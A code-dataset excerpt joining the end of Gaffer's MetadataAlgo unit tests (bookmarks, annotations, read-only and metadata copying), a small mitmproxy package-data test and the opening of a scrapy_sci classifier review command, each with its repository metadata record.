self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n0"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( b ), [] )
Gaffer.MetadataAlgo.setBookmarked( b["n0"], True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n0"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n1"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( b ), [ b["n0"] ] )
Gaffer.MetadataAlgo.setBookmarked( b["n1"], True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n0"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n1"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( b ), [ b["n0"], b["n1"] ] )
Gaffer.MetadataAlgo.setBookmarked( b["n0"], False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n0"] ), False )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b["n1"] ), True )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( b ), [ b["n1"] ] )
Gaffer.MetadataAlgo.setBookmarked( b, True )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), True )
self.assertTrue( b not in Gaffer.MetadataAlgo.bookmarks( b ) )
s = Gaffer.ScriptNode()
s.addChild( b )
self.assertEqual( Gaffer.MetadataAlgo.getBookmarked( b ), True )
self.assertEqual( Gaffer.MetadataAlgo.bookmarks( s ), [ b ] )
def testAffected( self ) :
n = GafferTest.CompoundPlugNode()
affected = []
ancestorAffected = []
childAffected = []
def plugValueChanged( nodeTypeId, plugPath, key, plug ) :
affected.append( Gaffer.MetadataAlgo.affectedByChange( n["p"]["s"], nodeTypeId, plugPath, plug ) )
ancestorAffected.append( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"]["s"], nodeTypeId, plugPath, plug ) )
childAffected.append( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], nodeTypeId, plugPath, plug ) )
c = Gaffer.Metadata.plugValueChangedSignal().connect( plugValueChanged, scoped = True )
Gaffer.Metadata.registerValue( Gaffer.Node, "user", "test", 1 )
self.assertEqual( affected, [ False ] )
self.assertEqual( ancestorAffected, [ False ] )
self.assertEqual( childAffected, [ False ] )
Gaffer.Metadata.registerValue( GafferTest.StringInOutNode, "p.s", "test", 1 )
self.assertEqual( affected, [ False, False ] )
self.assertEqual( ancestorAffected, [ False, False ] )
self.assertEqual( childAffected, [ False, False ] )
Gaffer.Metadata.registerValue( GafferTest.CompoundPlugNode, "p.s", "test", 1 )
self.assertEqual( affected, [ False, False, True ] )
self.assertEqual( ancestorAffected, [ False, False, False ] )
self.assertEqual( childAffected, [ False, False, True ] )
Gaffer.Metadata.registerValue( GafferTest.CompoundPlugNode, "p", "test", 2 )
self.assertEqual( affected, [ False, False, True, False ] )
self.assertEqual( ancestorAffected, [ False, False, False, True ] )
self.assertEqual( childAffected, [ False, False, True, False ] )
del affected[:]
del ancestorAffected[:]
del childAffected[:]
Gaffer.Metadata.registerValue( n["user"], "test", 3 )
self.assertEqual( affected, [ False ] )
self.assertEqual( ancestorAffected, [ False ] )
self.assertEqual( childAffected, [ False ] )
Gaffer.Metadata.registerValue( n["p"]["s"], "test", 4 )
self.assertEqual( affected, [ False, True ] )
self.assertEqual( ancestorAffected, [ False, False ] )
self.assertEqual( childAffected, [ False, True ] )
Gaffer.Metadata.registerValue( n["p"], "test", 5 )
self.assertEqual( affected, [ False, True, False ] )
self.assertEqual( ancestorAffected, [ False, False, True ] )
self.assertEqual( childAffected, [ False, True, False ] )
def testNodeAffected( self ) :
n = Gaffer.Box()
n["c"] = Gaffer.Node()
affected = []
childAffected = []
def nodeValueChanged( nodeTypeId, key, node ) :
affected.append( Gaffer.MetadataAlgo.affectedByChange( n, nodeTypeId, node ) )
childAffected.append( Gaffer.MetadataAlgo.childAffectedByChange( n, nodeTypeId, node ) )
c = Gaffer.Metadata.nodeValueChangedSignal().connect( nodeValueChanged, scoped = True )
Gaffer.Metadata.registerValue( Gaffer.Node, "metadataAlgoTest", 1 )
self.assertEqual( affected, [ True ] )
self.assertEqual( childAffected, [ True ] )
Gaffer.Metadata.registerValue( GafferTest.AddNode, "metadataAlgoTest", 2 )
self.assertEqual( affected, [ True, False ] )
self.assertEqual( childAffected, [ True, False ] )
Gaffer.Metadata.registerValue( n, "metadataAlgoTest", 3 )
self.assertEqual( affected, [ True, False, True ] )
self.assertEqual( childAffected, [ True, False, False ] )
n["a"] = GafferTest.AddNode()
Gaffer.Metadata.registerValue( n["a"], "metadataAlgoTest", 4 )
self.assertEqual( affected, [ True, False, True, False ] )
self.assertEqual( childAffected, [ True, False, False, True ] )
def testAncestorNodeAffected( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = GafferTest.AddNode()
s["b2"] = Gaffer.Box()
affected = []
def nodeValueChanged( nodeTypeId, key, node ) :
a = set()
for g in ( s["b"]["n"]["op1"], s["b"]["n"], s["b"] ) :
if Gaffer.MetadataAlgo.ancestorAffectedByChange( g, nodeTypeId, node ) :
a.add( g )
affected.append( a )
c = Gaffer.Metadata.nodeValueChangedSignal().connect( nodeValueChanged, scoped = True )
Gaffer.Metadata.registerValue( s["b"]["n"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 1 )
self.assertEqual( affected[-1], { s["b"]["n"]["op1"] } )
Gaffer.Metadata.registerValue( s["b"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 2 )
self.assertEqual( affected[-1], { s["b"]["n"], s["b"]["n"]["op1"] } )
Gaffer.Metadata.registerValue( s, "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 3 )
self.assertEqual( affected[-1], { s["b"], s["b"]["n"], s["b"]["n"]["op1"] } )
Gaffer.Metadata.registerValue( Gaffer.Box, "metadataAlgoTest", "test" )
Gaffer.Metadata.registerValue( s["b"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 4 )
self.assertEqual( affected[-1], { s["b"]["n"], s["b"]["n"]["op1"] } )
Gaffer.Metadata.registerValue( s["b2"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 5 )
self.assertEqual( affected[-1], set() )
def testCopy( self ) :
Gaffer.Metadata.registerValue( GafferTest.AddNode, "metadataAlgoTest", "test" )
s = GafferTest.AddNode()
Gaffer.Metadata.registerValue( s, "a", "a" )
Gaffer.Metadata.registerValue( s, "a2", "a2" )
Gaffer.Metadata.registerValue( s, "b", "b" )
Gaffer.Metadata.registerValue( s, "c", "c", persistent = False )
def registeredTestValues( node ) :
# We don't know what metadata might have been registered to the node
# before we run, so here we strip out any values that we're not interested in.
return set( Gaffer.Metadata.registeredValues( t ) ).intersection(
{ "metadataAlgoTest", "a", "a2", "b", "c" }
)
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t )
self.assertEqual( registeredTestValues( t ), { "metadataAlgoTest", "a", "a2", "b" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t, persistentOnly = False )
self.assertEqual( registeredTestValues( t ), { "metadataAlgoTest", "a", "a2", "b", "c" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t, exclude = "a*" )
self.assertEqual( registeredTestValues( t ), { "metadataAlgoTest", "b" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t, exclude = "a b" )
self.assertEqual( registeredTestValues( t ), { "metadataAlgoTest", "a2" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copy( s, t )
for k in Gaffer.Metadata.registeredValues( t ) :
self.assertEqual( Gaffer.Metadata.value( t, k ), Gaffer.Metadata.value( s, k ) )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copyIf( s, t, lambda f, t, n : n.startswith( "a" ) )
self.assertEqual( registeredTestValues( t ), { "a", "a2" } )
t = Gaffer.Node()
Gaffer.MetadataAlgo.copyIf( s, t, lambda f, t, n : n.startswith( "c" ) )
self.assertEqual( registeredTestValues( t ), { "c" } )
def testIsPromotable( self ) :
Gaffer.Metadata.registerValue( GafferTest.AddNode, "notPromotableTest:promotable", False )
Gaffer.Metadata.registerValue( GafferTest.AddNode, "notPromotableTest", "no")
Gaffer.Metadata.registerValue( GafferTest.AddNode, "promotableTest:promotable", True )
Gaffer.Metadata.registerValue( GafferTest.AddNode, "promotableTest", "yes" )
s = GafferTest.AddNode()
t = Gaffer.Node()
self.assertFalse( Gaffer.MetadataAlgo.isPromotable( s, t, "notPromotableTest" ) )
self.assertFalse( Gaffer.MetadataAlgo.isPromotable( s, t, "notPromotableTest:promotable" ) )
self.assertTrue( Gaffer.MetadataAlgo.isPromotable( s, t, "promotableTest") )
self.assertFalse( Gaffer.MetadataAlgo.isPromotable( s, t, "promotableTest:promotable" ) )
def testCopyColorKeepExisting( self ) :
plug1 = Gaffer.IntPlug()
plug2 = Gaffer.IntPlug()
connectionColor = imath.Color3f( 0.1 , 0.2 , 0.3 )
noodleColor = imath.Color3f( 0.4, 0.5 , 0.6 )
noodleColorExisting = imath.Color3f( 0.7, 0.8 , 0.9 )
Gaffer.Metadata.registerValue( plug1, "connectionGadget:color", connectionColor )
Gaffer.Metadata.registerValue( plug1, "nodule:color", noodleColor )
Gaffer.Metadata.registerValue( plug2, "nodule:color", noodleColorExisting )
Gaffer.MetadataAlgo.copyColors(plug1, plug2, overwrite = False )
self.assertEqual( Gaffer.Metadata.value( plug2, "connectionGadget:color" ), connectionColor )
self.assertEqual( Gaffer.Metadata.value( plug2, "nodule:color" ), noodleColorExisting )
def testCopyColorForceOverWrite( self ) :
plug1 = Gaffer.IntPlug()
plug2 = Gaffer.IntPlug()
connectionColor = imath.Color3f( 0.1 , 0.2 , 0.3 )
noodleColor = imath.Color3f( 0.4, 0.5 , 0.6 )
noodleColorExisting = imath.Color3f( 0.7, 0.8 , 0.9 )
Gaffer.Metadata.registerValue( plug1, "connectionGadget:color", connectionColor )
Gaffer.Metadata.registerValue( plug1, "nodule:color", noodleColor )
Gaffer.Metadata.registerValue( plug2, "nodule:color", noodleColorExisting )
Gaffer.MetadataAlgo.copyColors(plug1, plug2, overwrite = True )
self.assertEqual( Gaffer.Metadata.value( plug2, "connectionGadget:color" ), connectionColor )
self.assertEqual( Gaffer.Metadata.value( plug2, "nodule:color" ), noodleColor )
def testReadOnlyAffectedByChange( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = GafferTest.AddNode()
s["b2"] = Gaffer.Box()
affected = []
def nodeValueChanged( nodeTypeId, key, node ) :
a = set()
for g in ( s["b"]["n"]["op1"], s["b"]["n"], s["b"] ) :
if Gaffer.MetadataAlgo.readOnlyAffectedByChange( g, nodeTypeId, key, node ) :
a.add( g )
affected.append( a )
c1 = Gaffer.Metadata.nodeValueChangedSignal().connect( nodeValueChanged, scoped = True )
def plugValueChanged( nodeTypeId, plugPath, key, plug ) :
a = set()
for g in ( s["b"]["n"]["op1"], s["b"]["n"], s["b"] ) :
if Gaffer.MetadataAlgo.readOnlyAffectedByChange( g, nodeTypeId, plugPath, key, plug ) :
a.add( g )
affected.append( a )
c2 = Gaffer.Metadata.plugValueChangedSignal().connect( plugValueChanged, scoped = True )
Gaffer.Metadata.registerValue( s["b"]["n"]["op1"], "metadataAlgoTest", "test" )
self.assertEqual( len( affected ), 1 )
self.assertEqual( affected[-1], set() )
Gaffer.MetadataAlgo.setReadOnly( s["b"]["n"]["op1"], True )
self.assertEqual( len( affected ), 2 )
self.assertEqual( affected[-1], { s["b"]["n"]["op1"] } )
Gaffer.MetadataAlgo.setReadOnly( s["b"]["n"], True )
self.assertEqual( len( affected ), 3 )
self.assertEqual( affected[-1], { s["b"]["n"]["op1"], s["b"]["n"] } )
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( s["b"], True )
self.assertEqual( len( affected ), 4 )
self.assertEqual( affected[-1], { s["b"]["n"]["op1"], s["b"]["n"] } )
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( s["b2"], True )
self.assertEqual( len( affected ), 5 )
self.assertEqual( affected[-1], set() )
def testUnbookmarkedNodesDontHaveMetadata( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
self.assertEqual( len( Gaffer.Metadata.registeredValues( s["n"], instanceOnly = True ) ), 0 )
Gaffer.MetadataAlgo.setBookmarked( s["n"], True )
self.assertEqual( len( Gaffer.Metadata.registeredValues( s["n"], instanceOnly = True ) ), 1 )
Gaffer.MetadataAlgo.setBookmarked( s["n"], False )
self.assertEqual( len( Gaffer.Metadata.registeredValues( s["n"], instanceOnly = True ) ), 0 )
def testNumericBookmarks( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
s["n2"] = Gaffer.Node()
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["n1"] )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["n1"] )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n1"] ), 1 )
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["n2"] ) # moving the bookmark
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n1"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["n2"] )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n2"] ), 1 )
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, None )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n2"] ), 0 )
def testNumericBookmarksSerialisation( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
s["n2"] = Gaffer.Node()
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["n1"] )
Gaffer.MetadataAlgo.setNumericBookmark( s, 2, s["n2"] )
# Copying within script doesn't copy numeric bookmarks
s.execute( s.serialise() )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["n1"] )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 2 ), s["n2"] )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n3"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["n4"] ), 0 )
del s["n3"]
del s["n4"]
# Copying to new script preserves numeric bookmarks
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s2, 1 ), s2["n1"] )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s2, 2 ), s2["n2"] )
def testNumericBookmarksInReferences( self ) :
# Numeric bookmarks are removed when loading References.
s = Gaffer.ScriptNode()
s["box"] = Gaffer.Box()
s["box"]["n"] = Gaffer.Node()
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["box"]["n"] )
s["box"].exportForReference( self.temporaryDirectory() + "/bookmarked.grf" )
# Bring reference back in
s["r"] = Gaffer.Reference()
s["r"].load( self.temporaryDirectory() + "/bookmarked.grf" )
# Clashing Metadata was completely removed
self.assertEqual( Gaffer.Metadata.value( s["r"]["n"], "numericBookmark1" ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["r"]["n"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["box"]["n"] )
# Even without the clash, the metadata is removed
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, None )
s["r2"] = Gaffer.Reference()
s["r2"].load( self.temporaryDirectory() + "/bookmarked.grf" )
self.assertEqual( Gaffer.Metadata.value( s["r2"]["n"], "numericBookmark1" ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["r2"]["n"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), None )
def testNumericBookmarksInReadOnlyBox( self ) :
# Numeric bookmarks are removed when loading read-only boxes.
s = Gaffer.ScriptNode()
s["box"] = Gaffer.Box()
s["box"]["n"] = Gaffer.Node()
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, s["box"]["n"] )
s["box"].exportForReference( self.temporaryDirectory() + "/bookmarked.grf" )
# Bring the box back in, not as a Reference, but as read-only Box
s["b1"] = Gaffer.Box()
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( s["b1"], True )
s.executeFile( self.temporaryDirectory() + "/bookmarked.grf", parent = s["b1"], continueOnError = True)
# Clashing Metadata was completely removed
self.assertEqual( Gaffer.Metadata.value( s["b1"]["n"], "numericBookmark1" ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["b1"]["n"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["box"]["n"] )
# Even without the clash, the metadata is removed
Gaffer.MetadataAlgo.setNumericBookmark( s, 1, None )
s["b2"] = Gaffer.Box()
Gaffer.MetadataAlgo.setChildNodesAreReadOnly( s["b2"], True )
s.executeFile( self.temporaryDirectory() + "/bookmarked.grf", parent = s["b2"], continueOnError = True)
self.assertEqual( Gaffer.Metadata.value( s["b2"]["n"], "numericBookmark1" ), None )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["b2"]["n"] ), 0 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), None )
# But loading it without the read-only flag results in the bookmark being set
s["b3"] = Gaffer.Box()
s.executeFile( self.temporaryDirectory() + "/bookmarked.grf", parent = s["b3"], continueOnError = True)
self.assertEqual( Gaffer.Metadata.value( s["b3"]["n"], "numericBookmark1" ), True )
self.assertEqual( Gaffer.MetadataAlgo.numericBookmark( s["b3"]["n"] ), 1 )
self.assertEqual( Gaffer.MetadataAlgo.getNumericBookmark( s, 1 ), s["b3"]["n"] )
def testNumericBookmarkAffectedByChange( self ) :
# The naming convention for valid numeric bookmarks is "numericBookmark<1-9>"
for i in range( 1, 10 ) :
self.assertTrue( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "numericBookmark%s" % i ) )
self.assertFalse( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "numericBookmark0" ) )
self.assertFalse( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "numericBookmark-1" ) )
self.assertFalse( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "numericBookmark10" ) )
self.assertFalse( Gaffer.MetadataAlgo.numericBookmarkAffectedByChange( "foo" ) )
def testAffectedByPlugTypeRegistration( self ) :
n = GafferTest.CompoundPlugNode()
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"]["s"], Gaffer.StringPlug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.affectedByChange( n["p"]["s"], Gaffer.IntPlug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"], Gaffer.Plug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.StringPlug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.FloatPlug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.IntPlug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.childAffectedByChange( n["p"]["s"], Gaffer.StringPlug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"], Gaffer.CompoundPlug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"]["s"], Gaffer.CompoundPlug, changedPlugPath = "", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"]["s"], Gaffer.Plug, changedPlugPath = "", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.ancestorAffectedByChange( n["p"]["s"], Gaffer.StringPlug, changedPlugPath = "", changedPlug = None ) )
def testAffectedByPlugRelativeMetadata( self ) :
n = GafferTest.CompoundNumericNode()
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "*", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "[xyz]", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "...", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "x.c", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.affectedByChange( n["p"]["x"], Gaffer.V3fPlug, changedPlugPath = "c", changedPlug = None ) )
self.assertTrue( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.V3fPlug, changedPlugPath = "[xyz]", changedPlug = None ) )
self.assertFalse( Gaffer.MetadataAlgo.childAffectedByChange( n["p"], Gaffer.V3fPlug, changedPlugPath = "x.c", changedPlug = None ) )
def testAnnotations( self ) :
n = Gaffer.Node()
self.assertEqual( Gaffer.MetadataAlgo.annotations( n ), [] )
self.assertIsNone( Gaffer.MetadataAlgo.getAnnotation( n, "test" ) )
cs = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal( n ) )
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( "Hello world", imath.Color3f( 1, 0, 0 ) ) )
self.assertTrue( len( cs ) )
for x in cs :
self.assertTrue( Gaffer.MetadataAlgo.annotationsAffectedByChange( x[1] ) )
self.assertEqual( Gaffer.MetadataAlgo.annotations( n ), [ "test" ] )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( "Hello world", imath.Color3f( 1, 0, 0 ) )
)
del cs[:]
Gaffer.MetadataAlgo.addAnnotation( n, "test2", Gaffer.MetadataAlgo.Annotation( "abc", imath.Color3f( 0, 1, 0 ) ) )
self.assertTrue( len( cs ) )
for x in cs :
self.assertTrue( Gaffer.MetadataAlgo.annotationsAffectedByChange( x[1] ) )
self.assertEqual( Gaffer.MetadataAlgo.annotations( n ), [ "test", "test2" ] )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test2" ),
Gaffer.MetadataAlgo.Annotation( "abc", imath.Color3f( 0, 1, 0 ) )
)
del cs[:]
Gaffer.MetadataAlgo.removeAnnotation( n, "test" )
self.assertTrue( len( cs ) )
for x in cs :
self.assertTrue( Gaffer.MetadataAlgo.annotationsAffectedByChange( x[1] ) )
self.assertEqual( Gaffer.MetadataAlgo.annotations( n ), [ "test2" ] )
self.assertIsNone( Gaffer.MetadataAlgo.getAnnotation( n, "test" ) )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test2" ),
Gaffer.MetadataAlgo.Annotation( "abc", imath.Color3f( 0, 1, 0 ) )
)
def testAnnotationWithoutColor( self ) :
n = Gaffer.Node()
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( text = "abc" ) )
self.assertEqual( len( Gaffer.Metadata.registeredValues( n, instanceOnly = True ) ), 1 )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( text = "abc" )
)
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( text = "xyz", color = imath.Color3f( 1 ) ) )
self.assertEqual( len( Gaffer.Metadata.registeredValues( n, instanceOnly = True ) ), 2 )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( text = "xyz", color = imath.Color3f( 1 ) )
)
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( text = "abc" ) )
self.assertEqual( len( Gaffer.Metadata.registeredValues( n, instanceOnly = True ) ), 1 )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( text = "abc" )
)
def testAnnotationToBool( self ) :
self.assertFalse( Gaffer.MetadataAlgo.Annotation() )
self.assertTrue( Gaffer.MetadataAlgo.Annotation( "test" ) )
def testAnnotationTemplates( self ) :
defaultTemplates = Gaffer.MetadataAlgo.annotationTemplates()
self.assertIsNone( Gaffer.MetadataAlgo.getAnnotationTemplate( "test" ) )
a = Gaffer.MetadataAlgo.Annotation( "", imath.Color3f( 1, 0, 0 ) )
Gaffer.MetadataAlgo.addAnnotationTemplate( "test", a )
self.assertEqual( Gaffer.MetadataAlgo.getAnnotationTemplate( "test" ), a )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates(), defaultTemplates + [ "test" ] )
n = Gaffer.Node()
Gaffer.MetadataAlgo.addAnnotation( n, "test", Gaffer.MetadataAlgo.Annotation( "hi" ) )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( "hi" ),
)
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test", inheritTemplate = True ),
Gaffer.MetadataAlgo.Annotation( "hi", imath.Color3f( 1, 0, 0 ) ),
)
Gaffer.MetadataAlgo.removeAnnotationTemplate( "test" )
self.assertIsNone( Gaffer.MetadataAlgo.getAnnotationTemplate( "test" ) )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates(), defaultTemplates )
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test" ),
Gaffer.MetadataAlgo.Annotation( "hi" ),
)
self.assertEqual(
Gaffer.MetadataAlgo.getAnnotation( n, "test", inheritTemplate = True ),
Gaffer.MetadataAlgo.Annotation( "hi" ),
)
def testNonUserAnnotationTemplates( self ) :
defaultTemplates = Gaffer.MetadataAlgo.annotationTemplates()
userOnlyDefaultTemplates = Gaffer.MetadataAlgo.annotationTemplates( userOnly = True )
a = Gaffer.MetadataAlgo.Annotation( "", imath.Color3f( 1, 0, 0 ) )
Gaffer.MetadataAlgo.addAnnotationTemplate( "test", a, user = False )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates(), defaultTemplates + [ "test" ] )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates( userOnly = True ), userOnlyDefaultTemplates )
Gaffer.MetadataAlgo.addAnnotationTemplate( "test2", a, user = True )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates(), defaultTemplates + [ "test", "test2" ] )
self.assertEqual( Gaffer.MetadataAlgo.annotationTemplates( userOnly = True ), userOnlyDefaultTemplates + [ "test2" ] )
def tearDown( self ) :
for n in ( Gaffer.Node, Gaffer.Box, GafferTest.AddNode ) :
Gaffer.Metadata.deregisterValue( n, "metadataAlgoTest" )
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "881957d2d5c33bfdc68af52af36b4ea1",
"timestamp": "",
"source": "github",
"line_count": 756,
"max_line_length": 143,
"avg_line_length": 41.72486772486773,
"alnum_prop": 0.704349480091301,
"repo_name": "GafferHQ/gaffer",
"id": "ead9a77675e5c70bb5db07b9a3f60a839bcce5f5",
"size": "33347",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "python/GafferTest/MetadataAlgoTest.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5790"
},
{
"name": "C",
"bytes": "61993"
},
{
"name": "C++",
"bytes": "9572701"
},
{
"name": "CMake",
"bytes": "85201"
},
{
"name": "GLSL",
"bytes": "6208"
},
{
"name": "Python",
"bytes": "10280178"
},
{
"name": "Ruby",
"bytes": "419"
},
{
"name": "Shell",
"bytes": "14580"
}
],
"symlink_target": ""
} |
import pytest
from mitmproxy.utils import data
def test_pkg_data():
assert data.pkg_data.path("tools/console")
with pytest.raises(ValueError):
data.pkg_data.path("nonexistent")
| {
"content_hash": "6cf258f78e1368c7e6950831c46b0650",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 46,
"avg_line_length": 24.375,
"alnum_prop": 0.7128205128205128,
"repo_name": "StevenVanAcker/mitmproxy",
"id": "f40fc86657127ed60f5084884502a6bd52c17eca",
"size": "195",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "test/mitmproxy/utils/test_data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "20922"
},
{
"name": "HTML",
"bytes": "8617"
},
{
"name": "JavaScript",
"bytes": "276302"
},
{
"name": "PowerShell",
"bytes": "494"
},
{
"name": "Python",
"bytes": "1657512"
},
{
"name": "Shell",
"bytes": "4644"
}
],
"symlink_target": ""
} |
import os
import sys
import uuid
from scrapy.command import ScrapyCommand
from scrapy.utils.conf import arglist_to_dict
from scrapy.exceptions import UsageError
from collections import defaultdict
import json
from scrapy_sci.status import Status, Reader
from scrapy_sci.classifier import ClassifierFactory
class Command(ScrapyCommand):
requires_project = True
def syntax(self):
return "[options] <file_name>"
def short_desc(self):
return "Review file with classifiers"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("-c", "--classifiers", dest="classifiers", action="append", default=[],
help="list classifiers by which the file will be reviewed")
